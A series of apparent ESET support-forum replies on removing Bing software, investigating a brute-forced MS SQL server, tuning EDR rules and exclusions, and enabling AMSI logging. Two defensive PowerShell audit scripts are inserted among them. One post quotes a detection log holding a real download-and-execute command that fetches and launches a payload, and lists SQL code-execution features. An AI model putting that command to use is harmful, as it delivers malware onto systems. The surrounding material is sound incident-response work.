1. In ESET Protect, click on Computers on the left, then locate your newly made dynamic group named "Has Unwanted Software"
2. Click the gear next to the group name and click "Tasks > New Task..."
3. Name the task "Uninstall unwanted software - Microsoft Bing Service" and in the "Task" drop down, select "Software Uninstall" and click "Continue"
4. In this Settings section, click on "<Select package to uninstall>" and select the first piece of software to uninstall, "Microsoft Bing Service"
5. You may desire to click on "Uninstall all versions of package" to ensure any version gets removed.
6. Click "Continue" to get to the targets and ensure your desired target group "Has Unwanted Software" is showing in the list and then click "Continue"
7. In the "Trigger" section set the trigger type to "Joined Dynamic Group Trigger" (this will run this task on any computer as it gets added to our dynamic group, but not on computers already in this group. We will remedy this shortly.)
8. Continue and finish.
9. On your group "Has Unwanted Software" click the gear and choose "Tasks > Run Tasks"
10. Click on "Add Tasks" and find and checkmark your "Uninstall unwanted software - Microsoft Bing Service" and click OK
11. For the "Trigger" section, ensure trigger type is "As Soon As Possible" and click finish.
12. Repeat steps 1 through 11 but: in step 4 select "Bing Wallpaper"; in steps 3 and 10 use the task name "Uninstall unwanted software - Bing Wallpaper"
  16. Hello, The detection is accurate. It's a Potentially Unwanted Application (which is an optional detection for software which is not a virus, but may be undesired). If you do not allow this software on your environments, it would be recommended to uninstall it. I just posted some uninstall steps here:
  17. For those looking for assistance in removing this software, here are some steps to remove this from individual computers:
1. Windows + R, type "Appwiz.cpl" and press enter
2. Find and uninstall/remove (at the end of the uninstall, you may be directed to a Microsoft web page asking if you meant to uninstall and asked if you want to reinstall. Just close this):
   - Microsoft Bing Service
   - Bing Wallpaper
3. After that, start opening each web browser and checking for Bing Homepage/Search extensions/plugins and remove them (the prior uninstall leaves these in place and does not remove them).
   - Chrome: In the address bar, navigate to "chrome://extensions/" and click "remove" on anything like: "Microsoft Bing Homepage & Search for Chrome". After removal, you may be taken to a web page asking if you want to reinstall the extension.
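An added example that is not part of posts 15 or 17 and is not ESET's code: a local, scriptable equivalent of the "Has Unwanted Software" dynamic group from post 15, usable on a single machine alongside the manual appwiz.cpl steps in post 17. It reads the same Uninstall registry keys that Programs and Features lists, filters on the Application Name and Application Vendor values the dynamic group uses, and can run the uninstall command each entry recorded. Like the ESET task, it does not touch browser extensions. The three registry paths, the function names and the `Remove-UnwantedSoftware` behaviour are this example's own assumptions; run it in Windows PowerShell as an administrator.

```powershell
# Added example, not ESET's code or the poster's: a local equivalent of the
# "Has Unwanted Software" dynamic group. It reads the Uninstall registry keys
# that Programs and Features (appwiz.cpl) lists, matches on the Application
# Name / Application Vendor pairs from the post, and can run the recorded
# uninstall command. Assumption: these three key paths cover the installs.
$UninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'   # per-user installs of the current user
)

function Get-UnwantedSoftware {
    [CmdletBinding()]
    param(
        # Same values as the dynamic-group template: "is one of" on name and vendor.
        [string[]]$Name   = @('Microsoft Bing Service', 'Bing Wallpaper'),
        [string[]]$Vendor = @('Microsoft Corporation')
    )
    Get-ItemProperty -Path $UninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -and $Name -contains $_.DisplayName -and $Vendor -contains $_.Publisher } |
        ForEach-Object {
            # Prefer the quiet variant when the installer recorded one.
            $cmd = if ($_.QuietUninstallString) { $_.QuietUninstallString } else { $_.UninstallString }
            [pscustomobject]@{
                DisplayName     = $_.DisplayName
                Publisher       = $_.Publisher      # "Application Vendor" in ESET Protect
                DisplayVersion  = $_.DisplayVersion
                KeyPath         = $_.PSPath -replace '^.*?::', ''
                UninstallString = $cmd
            }
        }
}

function Remove-UnwantedSoftware {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$App)
    process {
        # UninstallString is "<exe> <args>", the exe sometimes quoted; split at the first .exe.
        if ($App.UninstallString -notmatch '^\s*"?(?<exe>[^"]+?\.exe)"?\s*(?<args>.*)$') {
            Write-Warning "$($App.DisplayName): no usable UninstallString ('$($App.UninstallString)'), remove it by hand"
            return
        }
        $exe, $arguments = $Matches.exe, $Matches.args
        if ($PSCmdlet.ShouldProcess($App.DisplayName, "Run: $exe $arguments")) {
            $startArgs = @{ FilePath = $exe; Wait = $true; PassThru = $true }
            if ($arguments) { $startArgs.ArgumentList = $arguments }   # Start-Process rejects an empty ArgumentList
            $proc = Start-Process @startArgs
            [pscustomobject]@{ DisplayName = $App.DisplayName; ExitCode = $proc.ExitCode }
        }
    }
}

# Usage: inventory first; rehearse with -WhatIf, then drop it to uninstall.
Get-UnwantedSoftware | Format-Table DisplayName, Publisher, DisplayVersion, KeyPath -AutoSize
# Get-UnwantedSoftware | Remove-UnwantedSoftware -WhatIf
```

The inventory half is the useful part for verifying post 15: if this lists an entry on a machine that never joined the dynamic group, the Agent policy from section I has not applied yet or the name/vendor strings differ from what the group template expects. As post 17 notes, the uninstall leaves browser extensions behind, so check each browser afterwards.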
  18. Looking at your detection logs from the ELC, I can see that originally you had a BAT/Runner.FJ trojan from Oct 29-31. Then starting on Nov 1st, it changed to a Powershell/TrojanDownloader. What is interesting is that the BAT/Runner.FJ detections show:

10/31/2022 11:15:29 AM Command line scanner file C:\Windows\System32\cmd.exe BAT/Runner.FJ trojan cleaned by deleting NT SERVICE\MSSQLSERVER Event occurred while attempting to run the following command: "C:\Windows\System32\cmd.exe" /C "echo $client = New-Object System.Net.WebClient > C:\Users\MSSQLS~1\AppData\Local\Temp\update.ps1 & echo $client.DownloadFile("<snippedURL>","C:\Users\MSSQLS~1\AppData\Local\Temp\OBKLH1X4.exe") >> C:\Users\MSSQLS~1\AppData\Local\Temp\update.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQLS~1\AppData\Local\Temp\update.ps1 & WMIC process call create "C:\Users\MSSQLS~1\AppData\Local\Temp\OBKLH1X4.exe"" 3352E2206ED375E648C9EA7B5171AC2CA4FCAF88

As you can see from the bolded underlined parts, it indicates these actions are definitely being done by your MS SQL server. I suspect your SQL management ports are exposed to the internet and you have successfully been brute forced and had some SQL persistence installed.
You can use the following NMAP scans to try and see if your SQL ports are exposed to the internet. Just ensure you perform the scans from a computer on a different public IP. Scanning from a computer on the same public IP can lead to incorrect scan results:

nmap -Pn -sV -p 1433-1434 %PublicIP%
nmap -Pn -sV -F %PublicIP%

There are many types of SQL Persistence, and if your MS SQL is hosting more than one database, each database will need to be checked. If you are having problems checking these, let us know and we can see about starting a DM to do some more specific SQL troubleshooting.
You will be looking for the following types of MS SQL persistence:
- Stored Procedures
  - At start of MS SQL service, a procedure will start and execute every certain amount of seconds/minutes/hours
  - A stored procedure can be "encrypted" to hide its definition from being easily seen
  - More info on Stored Procedures here: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- Triggers
  - DDL Triggers - Data Definition Language Triggers
    - Server based triggers which can be set to execute when specific queries like CREATE, ALTER, or DROP are used
    - These triggers can be "encrypted" to hide the definition from being easily seen
  - DML Triggers - Data Manipulation Language Triggers
    - Database based triggers which can be set to execute on specific queries like INSERT, UPDATE, or DELETE
    - Untested if these can be "encrypted" but it should be assumed that they can be encrypted as well
  - Logon Triggers
    - As their name implies, these are triggers which execute queries whenever a user logs in to MS SQL. And can theoretically, prevent a user from logging in.
    - Untested if these can be "encrypted" but it should be assumed that they can be encrypted as well
  - More info on Triggers here: https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/
- Other notes
  - In order to allow MS SQL to execute external applications, the use of advanced options is needed. You will want to check and disable these settings (Ensure you make note of what you changed, and monitor your SQL server for any issues afterwards. Your SQL server may have legitimately been using these settings):
    - "show advanced options" - Allows the following settings to be used
    - "xp_cmdshell" - Allows MS SQL to directly execute external applications like Ping.exe or any other executables on disk.
    - "Ole Automation Procedures" - Allows MS SQL to execute Windows Script Host and VBScript macros, which allows wscript.shell to execute other executables on the computer's disk, without the use of xp_cmdshell.
    - "clr enabled" - Allows you to store .net code inside of SQL which can be executed by a stored procedure. This is one of the more powerful ways of providing code execution to SQL. But these should easily be spotted when reviewing all stored procedures on a server.
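An added example, not part of the post and not the batch file the thread refers to (that file is not on this page): a Windows PowerShell script that audits one MS SQL instance for every persistence spot listed above, using the catalog views SQL Server exposes. It reports startup stored procedures (`OBJECTPROPERTY(..., 'ExecIsStartup')`), server-level DDL and logon triggers (`sys.server_triggers`), database-level DDL and DML triggers (`sys.triggers`, once per online database), flags any module whose definition is hidden (`definition IS NULL`, which is what `WITH ENCRYPTION` produces), and dumps the four advanced options from the post from `sys.configurations`. Assumptions: the instance name below, Windows authentication for the account running it, sysadmin rights so every database can be read, and Windows PowerShell 5.1 (where `System.Data.SqlClient` is available without extra modules).

```powershell
# Added example, not ESET's script and not the batch file mentioned in the thread:
# audits one MS SQL instance for the persistence spots listed in the post
# (startup stored procedures, server and database DDL triggers, DML triggers,
# logon triggers, "encrypted" definitions) and for the advanced options that
# let SQL execute external code. Assumptions: the instance name, Windows
# authentication, and sysadmin rights for the account running it.
param([string]$Instance = 'localhost')   # e.g. 'SQLSRV01\INST2'; run once per instance

Add-Type -AssemblyName System.Data

function Invoke-Sql {
    param([string]$Database, [string]$Query)
    $conn = New-Object System.Data.SqlClient.SqlConnection "Server=$Instance;Database=$Database;Integrated Security=True"
    $conn.Open()
    try {
        $table = New-Object System.Data.DataTable
        [void](New-Object System.Data.SqlClient.SqlDataAdapter $Query, $conn).Fill($table)
        $table.Rows   # one object per row; columns become properties
    } finally { $conn.Close() }
}

# Server scope (run in master): startup procedures plus server DDL and logon triggers.
# definition IS NULL means WITH ENCRYPTION (or a CLR module): the body is hidden from you.
$serverQuery = @'
SELECT 'StartupProc' AS Kind, DB_NAME() AS DbName,
       SCHEMA_NAME(p.schema_id) + '.' + p.name AS ObjectName, 'SERVICE_START' AS FiresOn,
       CAST(0 AS bit) AS IsDisabled,
       CAST(CASE WHEN m.definition IS NULL THEN 1 ELSE 0 END AS bit) AS IsEncrypted,
       LEFT(m.definition, 120) AS DefinitionHead, p.modify_date AS ModifyDate
FROM sys.procedures p
JOIN sys.sql_modules m ON m.object_id = p.object_id
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1
UNION ALL
SELECT CASE WHEN e.type_desc = 'LOGON' THEN 'LogonTrigger' ELSE 'ServerDDLTrigger' END,
       '(server)', t.name, e.type_desc, t.is_disabled,
       CAST(CASE WHEN m.definition IS NULL THEN 1 ELSE 0 END AS bit),
       LEFT(m.definition, 120), t.modify_date
FROM sys.server_triggers t
JOIN sys.server_trigger_events e ON e.object_id = t.object_id
LEFT JOIN sys.server_sql_modules m ON m.object_id = t.object_id;
'@

# Database scope (run once per database): DDL triggers (parent_id = 0) and DML triggers on tables/views.
$databaseQuery = @'
SELECT CASE WHEN t.parent_class_desc = 'DATABASE' THEN 'DatabaseDDLTrigger' ELSE 'DMLTrigger' END AS Kind,
       DB_NAME() AS DbName,
       CASE WHEN t.parent_id = 0 THEN t.name
            ELSE OBJECT_SCHEMA_NAME(t.parent_id) + '.' + OBJECT_NAME(t.parent_id) + ' -> ' + t.name END AS ObjectName,
       e.type_desc AS FiresOn, t.is_disabled AS IsDisabled,
       CAST(CASE WHEN m.definition IS NULL THEN 1 ELSE 0 END AS bit) AS IsEncrypted,
       LEFT(m.definition, 120) AS DefinitionHead, t.modify_date AS ModifyDate
FROM sys.triggers t
JOIN sys.trigger_events e ON e.object_id = t.object_id
LEFT JOIN sys.sql_modules m ON m.object_id = t.object_id
WHERE t.is_ms_shipped = 0;
'@

# The advanced options from the post; ValueInUse 1 = enabled.
$configQuery = @'
SELECT name, CAST(value_in_use AS int) AS ValueInUse
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');
'@

$findings = @(Invoke-Sql -Database master -Query $serverQuery)
foreach ($db in Invoke-Sql -Database master -Query "SELECT name FROM sys.databases WHERE state_desc = 'ONLINE'") {
    $findings += @(Invoke-Sql -Database $db.name -Query $databaseQuery)
}

"== Persistence candidates on $Instance =="
$findings | Format-Table Kind, DbName, ObjectName, FiresOn, IsDisabled, IsEncrypted, DefinitionHead -AutoSize -Wrap
$findings | Where-Object { $_.IsEncrypted } |
    ForEach-Object { Write-Warning "Hidden definition, review by other means: $($_.Kind) $($_.DbName) $($_.ObjectName)" }

"== Code-execution options =="
Invoke-Sql -Database master -Query $configQuery | Format-Table name, ValueInUse -AutoSize
```

Read the output the way the post describes: a `StartupProc` row is the "runs at service start" case, `ServerDDLTrigger`/`DatabaseDDLTrigger` rows fire on CREATE/ALTER/DROP, `DMLTrigger` rows on INSERT/UPDATE/DELETE, and a `LogonTrigger` row runs at every login. Anything with `IsEncrypted` set has no readable body in the catalog, which is exactly the hiding trick the post warns about, so treat those as suspect until the object is decrypted or dropped. A `1` beside `xp_cmdshell`, `Ole Automation Procedures` or `clr enabled` is the code-execution path to turn off after noting the current value, as the post advises. Run the script once per instance, since each instance has its own master database and configuration.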
  19. There was some splitting of tables in the current v1.8. There is a good chance this is what led to the upgrade taking longer. The only other item I know of that affects the speed of upgrading is hard drive space. If there isn't enough drive space, it can slow down or completely stop the upgrade process.
  20. I recommend walking away and letting it be. Depending on which version you are upgrading from, it can take quite a bit to complete. Some of the earlier versions of EI could take hours to upgrade due to the changes needing to be made to the database. But yes, that final part of the upgrade will just sit there at about 92% for the longest. Hopefully your upgrade doesn't take too long, but don't be surprised if it does take a couple of hours. Just don't click cancel, and let it do what it needs to do.
  21. The rule "Microsoft Office Wscript Usage [D0812]" is purely looking for any office application to load the wshom.ocx library. This library allows for the usage of the Windows Script Host directly without the need to use wscript.exe or cscript.exe. Sometimes users will use an office plugin that will lead to this detection and this will cause every use of an MS Office application to trigger this detection.
My recommended actions would be:
1. If possible, supply a copy of the office document as a sample to Marcos or me (zipped up and password protected). We can help verify there are no normal macros, XLM macros, or Stomped (hidden) macros.
2. Check the computer for any other dangerous detections by the EDR or by the Endpoint product itself
   - Inside EI, open the details of the computer that triggered detection
   - Then locate the tab at the top labeled "Detections" and review this for any other dangerous detections
3. If you have not done so already, enable AMSI logging of MS Office documents (MS Office 2016 or newer only). This can add more details in EI to verify no macros were logged by AMSI (will post some steps for doing this via GPO below)
   - You would need to click on the triggering process in the process tree "excel.exe (13000)", and then locate the tab at the top labeled "Scripts"
4. If you do not find any other dangerous detections in EI, and the detection is not re-occurring, resolve the detection and move along.
5. If you do not find any other detections in EI, and the detection keeps re-occurring, create an exclusion for the specific computer
6. Lastly, you may want to touch base with the end user. They could have opened up Excel, opened the Macro editor, typed in a test macro and pressed F5 to run the macro causing the wshom.ocx library to be loaded.
If I had to purely decide off what I see here for "is it malicious" it looks benign to me. No child processes. No WMI Execution EI Detections. Only oddity is the "winlogon.exe > userinit.exe > pfwsmgr.exe > Explorer.exe" for the ancestor processes. That pfwsmgr.exe is a bit odd to me, but I assume it may be some user management software you are using. Normal user logon process trees would simply look like "winlogon.exe > userinit.exe > Explorer.exe".

Steps to enable AMSI logging via GPO (if needed)

Download ADMX GPO Templates
1. Download and extract ADMX file to DC
   - Administrative Template files (ADMX/ADML) for Microsoft 365 Apps for enterprise/Office LTSC 2021/Office 2019/Office 2016 and the Office Customization Tool for Office 2016: https://www.microsoft.com/en-us/download/details.aspx?id=49030
   - There are both x86 and x64 versions. You will need the version to match the computer you will be managing GPOs from. Thus if you are on a x86 computer and managing GPOs, you would use the x86 version (does not need to match the arch of the MS Office on network)
2. Run the EXE and follow its steps to extract them. Extract them to a temp location like "C:\CCSupport\ADMX_TEMP\"
3. Next, from the "C:\CCSupport\ADMX_TEMP\admx\" directory, copy all .admx files from your temp folder, and place them in "C:\Windows\PolicyDefinitions\"
4. Lastly, from the "C:\CCSupport\ADMX_TEMP\admx\" copy the "en-US" contents (.adml files) to the "C:\Windows\PolicyDefinitions\en-US\" directory. If other languages are needed, you can copy those to their corresponding locations
5. Now, close any open Group Policy Management editors, and reopen one (you simply need to start editing or creating a new GPO), and check the following 2 locations for Microsoft Office branches.
   - Computer Configuration > Policies > Administrative Templates
     - Microsoft Office 2016 (Machine)
     - Microsoft Office PowerPoint 2016 (Machine)
   - User Configuration > Policies > Administrative Templates
     - Microsoft Access 2016
     - Microsoft Excel 2016
     - Microsoft Office 2016
     - Microsoft OneNote 2016
     - Microsoft Outlook 2016
     - Microsoft PowerPoint 2016
     - Microsoft Project 2016
     - Microsoft Publisher 2016
     - Microsoft Teams
     - Microsoft Visio 2016
     - Microsoft Word 2016

Set Group Policy to enable AMSI logging/scanning of MS Office VBA Macros:
1. Edit or create a new policy that will be linked/applied to computers.
2. In the Group Policy Editor, navigate to: User Configuration > Policies > Administrative Templates > Microsoft Office 2016 > Security Settings
3. Locate "Macro Runtime Scan Scope" and Edit it.
4. Set the policy to "Enabled" and then set the options to one of the following 2 items:
   - "Enable for low trust documents" - AMSI scanning/logging of documents which are NOT any of the following:
     - Opened while macro security settings are set to "Enable All Macros"
     - Opened from a "Trusted Location"
     - Trusted Documents
     - Files that contain VBA that is digitally signed by a Trusted Publisher
   - "Enable for all documents" - AMSI scanning is done for all documents regardless of where they came from. This is perfect for test environments, or for environments where a SOC is present to analyze all macros in an environment.
5. Click OK/Apply, close any open windows.
6. Go to a workstation and run "gpupdate /force"
The following registry key should be set after the policy is applied:
Key: HKCU\software\policies\microsoft\office\16.0\common\security
Value: macroruntimescanscope
Type: REG_DWORD
Data: 0 = Off, 1 = Enable for Low Trust Docs, 2 = Enable for all docs
  22. @isuruSam You would simply need to alter the advanced exclusion to meet your needs. This means you would have the following options to base your exclusion off of.
You may want to exclude all processes which are of higher global reputation, which means only less reputable applications will trigger when injecting into MSTSC.exe:

<definition>
  <process>
    <!-- Only exclude if the executable has a good global reputation (LiveGrid Rep) and has been seen globally on 100 or more computers -->
    <!-- You may need to change these numbers based on what you are seeing in your own environment -->
    <operator type="AND">
      <condition component="LiveGrid" property="Reputation" condition="greaterOrEqual" value="8"/>
      <condition component="LiveGrid" property="Popularity" condition="greaterOrEqual" value="100"/>
    </operator>
  </process>
  <operations>
    <operation type="CodeInjection">
      <!-- Describe the possible mstsc.exe processes which are being injected into. Remove or add any different types of components you desire. Keep in mind that this exclusion will not exclude any mstsc.exe processes from "%WINDIR%\WinSxS\..." locations -->
      <operator type="and">
        <operator type="or">
          <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\mstsc.exe"/>
          <condition component="FileItem" property="FullPath" condition="is" value="%WINDIR%\SysWOW64\mstsc.exe"/>
        </operator>
        <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/>
        <condition component="Module" property="SignerName" condition="is" value="Microsoft Windows"/>
      </operator>
    </operation>
  </operations>
</definition>

If too many different processes are causing this to trigger, on the vast majority of computers, then you may want to exclude any process injecting into mstsc.exe. This means if something malicious does inject into mstsc.exe, you will not see it, but if MSTSC.exe starts doing other actions that are dangerous, you will still see those:

<definition>
  <operations>
    <operation type="CodeInjection">
      <!-- Describe the possible mstsc.exe processes which are being injected into. Remove or add any different types of components you desire. Keep in mind that this exclusion will not exclude any mstsc.exe processes from "%WINDIR%\WinSxS\..." locations -->
      <operator type="and">
        <operator type="or">
          <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\mstsc.exe"/>
          <condition component="FileItem" property="FullPath" condition="is" value="%WINDIR%\SysWOW64\mstsc.exe"/>
        </operator>
        <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/>
        <condition component="Module" property="SignerName" condition="is" value="Microsoft Windows"/>
      </operator>
    </operation>
  </operations>
</definition>

In the end, the final decision on how to exclude is yours to decide. Feel free to use these examples as a base for building your own exclusion. Hopefully this helps you out.
  23. I am going to assume that you are seeing injections into the "mstsc.exe" process (visible in the "Trigger Event" of the detection). If this is not correct, then please disregard the following.
There are 3 rules for "Injection into system process" (EDIT: Only apply exclusion to the rules causing incorrect detections):
- Injection into system process [F0413a][C]
- Injection into system process [F0413b][C]
- Injection into system process [F0413c][C]
All are looking for injection into processes located in:
- Windows\System32\ = %System%
- Windows\SysWOW64\ = %WinDir%\SysWOW64
Armed with knowing this is only happening on your terminal services servers, I would build an exclusion that will only apply to your terminal servers. The exclusion would look something like this:

<definition>
  <process>
    <!-- List of servers go here. If only a single server, remove the operator tags from this process section -->
    <operator type="OR">
      <condition component="Enterprise" property="ComputerName" condition="is" value="TermSvr001"/>
      <condition component="Enterprise" property="ComputerName" condition="is" value="TermSvr002"/>
    </operator>
  </process>
  <operations>
    <operation type="CodeInjection">
      <!-- Describe the possible mstsc.exe processes which are being injected into. Remove or add any different types of components you desire. Keep in mind that this exclusion will not exclude any mstsc.exe processes from "%WINDIR%\WinSxS\..." locations -->
      <operator type="and">
        <operator type="or">
          <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\mstsc.exe"/>
          <condition component="FileItem" property="FullPath" condition="is" value="%WINDIR%\SysWOW64\mstsc.exe"/>
        </operator>
        <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/>
        <condition component="Module" property="SignerName" condition="is" value="Microsoft Windows"/>
      </operator>
    </operation>
  </operations>
</definition>
  24. Your "Advanced" exclusion looks good to me. The ltsvc.exe process has a distance of 2 from the triggering process of find.exe There is a chance that the task to resolve matching detections is not working, and that the exclusion is working fine. I would suggest saving the advanced exclusion you posted above, and then manually resolve the current detections and wait to see if more of the same detections come in. And also check the "Hit Count" for the exclusion after letting it sit for a day or 2. "Hit Count" - For exclusions, this is how many detections the exclusion has prevented since it was last edited. Editing the exclusion will zero out the hit count. Where to find hit count: